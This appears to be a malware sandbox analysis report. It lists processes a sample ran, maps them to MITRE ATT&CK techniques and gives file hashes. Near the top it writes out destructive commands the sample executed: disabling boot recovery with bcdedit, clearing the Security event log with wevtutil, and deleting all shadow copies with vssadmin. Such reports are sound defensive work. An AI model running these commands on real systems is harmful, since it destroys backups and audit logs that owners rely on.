C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:14148
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:14092
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:14388
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:14232
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
684B
MD5e52ec77e949643d428f38e1bbcda9ac5
SHA1f33dc386417f84eba76f1021c70d48f004f3fd35
SHA256cc0f53a25dc4a04a8a8a196e4a16c9403ea45a585745700e469b1502db3bab63
SHA512f0730bb6c0e522e71125bdae998b7c2e354bb28343635afd234830cb433d29c9a0dee18fb1a52fa2ff7e39f71f122e139b4adc32b5b991a367d0924ecafbef26
-
Filesize
1KB
MD546418e53d226cfc28e848419043a926e
SHA1254a0f6cb73b25bc5926d81cb8307270f3df3697
SHA256292af8e082998a440518daa7a3f00079c344884bacd4141fa2ce81dceeef1322
SHA512ebe23beef2187c873f7e949c8f11c8d3945cacbd07b23685799dc93e42f82e515f4ca897d61861bd63b789d2597215d1df5917f680d1ca8907fb433786809811
-
Filesize
12KB
MD59ae7898dc9466c108faccdae194cc2fc
SHA1aab50f8c25d700868da72ad5af58bc97f6913922
SHA25638461d457fa80f9f458ace54dad1aee2d0bb76e736b3a79fc9996d79979d9abf
SHA5121f5d6d66b22fb54beeee685ece58b37c14bd07e7917498cd812baaba5b4914d52e3ac04b89fa2746894b688f90dcb0b7a1e22fc9137bfbc4bf012e2994ba054c